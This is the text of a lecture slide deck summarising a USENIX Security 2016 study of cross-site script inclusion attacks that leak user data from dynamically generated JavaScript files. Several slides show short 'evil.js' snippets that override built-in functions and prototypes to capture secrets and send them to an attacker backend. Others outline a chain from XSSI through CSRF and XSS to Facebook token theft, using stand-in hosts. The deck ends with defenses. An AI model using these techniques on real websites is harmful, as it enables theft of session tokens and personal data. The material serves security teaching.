Tweet
Tweet

Slide 1

Slide 1 text

Presented by Liang Gong 2016 Fall The Unexpected Dangers of Dynamic JavaScript Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Sebastian lekies, Ben Stock, Martin Wentzel, Martin Johns USENIX Security 2016

Slide 2

Slide 2 text

2 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Overview • Technical Background: An empirical study on generalized XSSI. • Cross-Site Script Inclustion (XSSI): • JSON hijacking • JavaScript hijacking • Generalising XSSI: • Dynamic JavaScript files • Leaking sensitive data from a JS file • Evaluation: • Top 150 websites ranked by Alexa

Slide 3

Slide 3 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ 3

Slide 4

Slide 4 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ 4

Slide 5

Slide 5 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ 5

Slide 6

Slide 6 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ 6

Slide 7

Slide 7 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ 7

Slide 8

Slide 8 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ JS 8

Slide 9

Slide 9 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ JS 9

Slide 10

Slide 10 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ JS 10

Slide 11

Slide 11 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. An Attack Scenario http://attacker.org/ http://email.com/ http://attacker.org/ JS 11 Same-Origin Policy • Restricts communication of active content to objects that share the same origin • Origin: protocol, port, and the host

Slide 12

Slide 12 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ 12

Slide 13

Slide 13 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ http://attacker.org/ 13

Slide 14

Slide 14 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ http://attacker.org/ 14

Slide 15

Slide 15 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ http://attacker.org/ 15

Slide 16

Slide 16 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ http://attacker.org/ 16

Slide 17

Slide 17 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ http://attacker.org/ 17 [ ["John Doe", "[email protected]"], ["John Doe", "[email protected]"] ]

Slide 18

Slide 18 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. JSON Hijacking (2006) http://attacker.org/ http://gmail.com/ http://attacker.org/ 18 [ ["John Doe", "[email protected]"], ["John Doe", "[email protected]"] ] function Array() { // steal data }

Slide 19

Slide 19 text

19 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Cross-Site Script Inclusion • A handful of attack vectors – mostly based on browser quirks • To leak data from non-JavaScript files – JSON, CSV, etc. • Most vectors are fixed in modern browsers

Slide 20

Slide 20 text

20 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Motivation • Why is there no research on JS files? • Are there JS files which contain user data? • Can such data be leaked in a similar way?

Slide 21

Slide 21 text

21 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Empirical Study Are there JS files which contain user data? • Sensitive data may be bound to session • JS files may be dynamically generated based on cookies. Create a browser extension: • Monitor all scripts encountered within a session • Request each script with and without cookies • Diff the results

Slide 22

Slide 22 text

22 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Empirical Study Are there JS files which contain user data? • Sensitive data may be bound to session • JS files may be dynamically generated based on cookies. Create a browser extension: • Monitor all scripts encountered within a session • Request each script with and without cookies • Diff the results

Slide 23

Slide 23 text

23 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Empirical Study Create a browser extension: • Monitor all scripts encountered within a session • Request each script with and without cookies • Diff the results Registered accounts on the first 150 Alexa top sites Investigate each site: • Seed the accounts with personalized data • Thoroughly interact with the site (thru extension) • Manually analyze the dynamic JS scripts

Slide 24

Slide 24 text

24 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Empirical Study Create a browser extension: • Monitor all scripts encountered within a session • Request each script with and without cookies • Diff the results Registered accounts on the first 150 Alexa top sites Investigate each site: • Seed the accounts with personalized data • Thoroughly interact with the site (thru extension) • Manually analyze the dynamic JS scripts

Slide 25

Slide 25 text

25 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Empirical Study Create a browser extension: • Monitor all scripts encountered within a session • Request each script with and without cookies • Diff the results Registered accounts on the first 150 Alexa top sites Investigate each site: • Seed the accounts with personalized data • Thoroughly interact with the site (thru extension) • Manually analyze the dynamic JS scripts

Slide 26

Slide 26 text

26 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. State-dependent JS Scripts Scripts generated based on info in cookies • 209 scripts from 49 domains • 40 domains do not have CSRF tokens for scripts Script purpose: • User-specific data: contains email addr, preference etc. • Service bootstrapping: contains data API tokens • Cross-service data sharing: single sign-on

Slide 27

Slide 27 text

Security Sensitive Data in Scripts 27 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley.

Slide 28

Slide 28 text

Security Sensitive Data in Scripts 28 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. e.g., set a variable to true for login

Slide 29

Slide 29 text

Security Sensitive Data in Scripts 29 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. e.g., set a variable to true for login Name, user id, email addr

Slide 30

Slide 30 text

Security Sensitive Data in Scripts 30 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. e.g., set a variable to true for login Name, user id, email addr birthday, location, real name

Slide 31

Slide 31 text

Security Sensitive Data in Scripts 31 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. e.g., set a variable to true for login CSRF or auth tokens Name, user id, email addr birthday, location, real name

Slide 32

Slide 32 text

32 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/

Slide 33

Slide 33 text

33 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/

Slide 34

Slide 34 text

34 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/

Slide 35

Slide 35 text

35 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/ // 1. insert the script tag

Slide 36

Slide 36 text

36 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/ // 1. insert the script tag

Slide 37

Slide 37 text

37 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/ // 1. insert the script tag

Slide 38

Slide 38 text

38 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/ // 1. insert the script tag

Slide 39

Slide 39 text

39 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? http://attacker.org/ http://vuln.com/ http://attacker.org/ // 1. insert the script tag // 2. observe side effect

Slide 40

Slide 40 text

40 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? Leaking data stored in global variables: // local variable at top level var first_name = "John"; // variable missing the "var" keyword last_name = "Doe"; // global variable window.user_email = "[email protected]"; console.log(first_name); console.log(last_name); Console.log(user_email); dynamic.js evil.js

Slide 41

Slide 41 text

41 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? Leaking data via global functions: function example() { var email = "[email protected]"; window.MyLibrary.doSomething(email); } window.MyLibrary = {}; window.MyLibrary.doSomething = function(email) { console.log(email); } dynamic.js evil.js

Slide 42

Slide 42 text

42 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? Leaking data via built-in APIs: function example() { var email = "[email protected]"; JSON.stringify(email); } JSON.stringify = function (data) { sendToAttackerBackend(data); } dynamic.js evil.js

Slide 43

Slide 43 text

RQ: Can such data be leaked in a similar way? Leaking data via built-in APIs: function example() { var email = "[email protected]"; JSON.stringify(email); } JSON.stringify = function (data) { sendToAttackerBackend(data); } dynamic.js evil.js Other APIs: ArrayBuffer, Map, Set, WeakMap, WeakSet decudeURI, decudeURIComponent, encodeURI, encodeURIComponent, escape, unescape ... 43 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley.

Slide 44

Slide 44 text

44 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Prototypical Inheritance // object1  Object.prototype  null var object1 = {a: 1}; // object2  object1  Object.prototype  null var object2 = Object.create(object1); console.log(object2.a) > 1

Slide 45

Slide 45 text

45 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? Leaking data via the this reference: (function () { var secret_values = ["[email protected]", "top secret"]; secret_values.forEach(function (secret) { // do something secret here }) })(); Array.prototype.forEach = function(callback) { console.log(this); // this points to the array } dynamic.js evil.js

Slide 46

Slide 46 text

Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. RQ: Can such data be leaked in a similar way? Leaking data via the this reference: (function () { var secret_values = ["[email protected]", "top secret"]; secret_values.forEach(function (secret) { // do something secret here }) })(); Array.prototype.forEach = function(callback) { console.log(this); // this points to the array } dynamic.js evil.js Other APIs: String.prototype.concat String.prototype.substring String.prototype.toString String.prototype.replace Array.prototype.join Array.prototype.map Array.prototype.forEach ... 46

Slide 47

Slide 47 text

Empirical Study 47 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Some scripts are not exploitable because the URL contains CSRF and therefore cannot be inserted in the attack page. Dynamic scripts based on cookies CSRF or auth tokens Name, user id, email addr birthday, location, school

Slide 48

Slide 48 text

48 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. A Loophole Found on G+ http://attacker.org/ http://attacker.org/ isLoggedIn = ... isPlusUser = ... userFirstPartyAuthV2 = ...

Slide 49

Slide 49 text

49 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. A Loophole Found on G+ http://attacker.org/ http://attacker.org/ isLoggedIn = ... isPlusUser = ... userFirstPartyAuthV2 = ... Show some phishing link aimed at Google users.

Slide 50

Slide 50 text

50 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Other Leaked Info Email address (14 domains) Phone number (1 domain) Real first name (10 domains) Calendar data (1 domain) These info can be used for: • User tracking • Personalized phishing attack • Spam email • Personalized Advertisement

Slide 51

Slide 51 text

51 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Other Leaked Info Email address (14 domains) Phone number (1 domain) Real first name (10 domains) Calendar data (1 domain) These info can be used for: • User tracking • Personalized phishing attack • Spam email • Personalized Advertisement

Slide 52

Slide 52 text

52 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Leaking Detailed Email Info From a email services domain: • The main page previewed the last 5 emails • Subject, sender, date and msgId

Slide 53

Slide 53 text

53 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Session Hijacking on File Storage Services http://attacker.org/ http://vuln.com/ http://attacker.org/ The script leaked the Username and session ID. The session ID can be used to access all files on vuln.com.

Slide 54

Slide 54 text

54 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. A More Interesting Attack XSSI  CSRF  XSS  Facebook post • A news site hosted a script containing the CSRF token • The CSRF token enabled us to send profile change requests • In the profile page there was a XSS • A Facebook auth token was stored inside a cookie.

Slide 55

Slide 55 text

55 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://attacker.org/

Slide 56

Slide 56 text

56 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://attacker.org/

Slide 57

Slide 57 text

57 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://attacker.org/

Slide 58

Slide 58 text

58 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://attacker.org/ Steal vuln.com CSRF token

Slide 59

Slide 59 text

59 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://attacker.org/ Steal vuln.com CSRF token CSRF http://vuln.com/changeprofile.php?CSRF=...&info=...

Slide 60

Slide 60 text

60 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://vuln.com/profile http://vuln.com/changeprofile.php?CSRF=...&info=... Name: John Doe Email: [email protected]

Slide 61

Slide 61 text

61 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://vuln.com/profile http://vuln.com/changeprofile.php?CSRF=...&info=... Name: John Doe Email: [email protected] http://vuln.com/changeprofile.php?CSRF=...&info=... info=JS code

Slide 62

Slide 62 text

62 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://vuln.com/profile http://vuln.com/changeprofile.php?CSRF=...&info=... Name: John Doe Email: JS code http://vuln.com/changeprofile.php?CSRF=...&info=... info=JS code

Slide 63

Slide 63 text

63 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://vuln.com/profile Name: John Doe Email: JS code

Slide 64

Slide 64 text

64 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://vuln.com/profile Name: John Doe Email: JS code Search for Facebook tokens on this page This site is SSO through Facebook API.

Slide 65

Slide 65 text

65 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. XSSI  CSRF  XSS  Facebook post http://attacker.org/ http://vuln.com/ http://vuln.com/profile Name: John Doe Email: JS code Got token, and interact with Facebook with the token http://facebook.com/

Slide 66

Slide 66 text

66 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. Empirical Study Taking over an account at a file hoster • Utilized an Ajax driven Web UI • An authentication token was required for these XHRs • The Token was provided inside a script file • Change the user’s password only requires the email (does not require the old password) • The email is leaked via script.

Slide 67

Slide 67 text

67 Liang Gong, Electric Engineering & Computer Science, University of California, Berkeley. How to prevent? Prevent the script from being included by a third-party • Solution 1: Strict referrer checking (error-prone) • Solution 2: Randomize the script’s URL for each users (include tokens) Separate JavaScript code from sensitive data: • Create static JS files and load data dynamically at run time • The data services can be protected via the SOP Or inline the script with sensitive data into the web page.